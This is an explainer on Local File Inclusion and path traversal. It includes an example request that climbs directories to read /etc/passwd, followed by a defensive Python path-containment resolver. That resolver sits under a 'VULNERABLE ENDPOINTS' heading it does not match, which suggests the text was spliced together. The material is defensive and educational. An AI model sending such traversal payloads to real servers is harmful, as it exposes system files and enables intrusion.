An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.
Directory Traversal

Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows:

http://example.com/?file=../../../../etc/passwd

In the above example, an attacker can get the contents of the /etc/passwd file, which contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack.

VULNERABLE ENDPOINTS:
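As an added example (not code from the original report), the following Python resolver shows the containment check a server-side include should perform on a user-supplied ?file= value before opening it: repeated percent-decoding (so ..%2f and double-encoded variants are normalised), rejection of NUL bytes and absolute paths, canonicalisation, and a check that the result still lies under the include directory. BASE_DIR, the allow-listed suffixes and the sample inputs are assumptions.

```python
import os
from urllib.parse import unquote

# Assumed web root for includable pages and an assumed allow-list of page types.
BASE_DIR = "/var/www/app/pages"
ALLOWED_SUFFIXES = (".html", ".txt")


class UnsafePathError(ValueError):
    """Raised when a requested file must not be served."""


def resolve_include(user_value: str, base_dir: str = BASE_DIR) -> str:
    """Map an untrusted ?file= value to an absolute path under base_dir.

    Decodes percent-encoding until stable (bounded, to catch ..%252f style
    double encoding), rejects NUL bytes and absolute paths, canonicalises the
    joined path and confirms it is still inside base_dir.
    """
    base = os.path.realpath(base_dir)
    decoded = user_value
    for _ in range(3):                       # bounded loop against double-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded or decoded.startswith(("/", "\\")):
        raise UnsafePathError(f"rejected path: {user_value!r}")
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Containment check: candidate must be base itself or a descendant of it.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePathError(f"traversal outside base dir: {user_value!r}")
    if not candidate.endswith(ALLOWED_SUFFIXES):
        raise UnsafePathError(f"disallowed file type: {user_value!r}")
    return candidate


def is_safe(user_value: str, base_dir: str = BASE_DIR) -> bool:
    """True if the value would be served, False if the resolver rejects it."""
    try:
        resolve_include(user_value, base_dir)
        return True
    except UnsafePathError:
        return False
```

Logging each UnsafePathError with the raw user_value gives a direct detection signal for traversal attempts against the include parameter.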
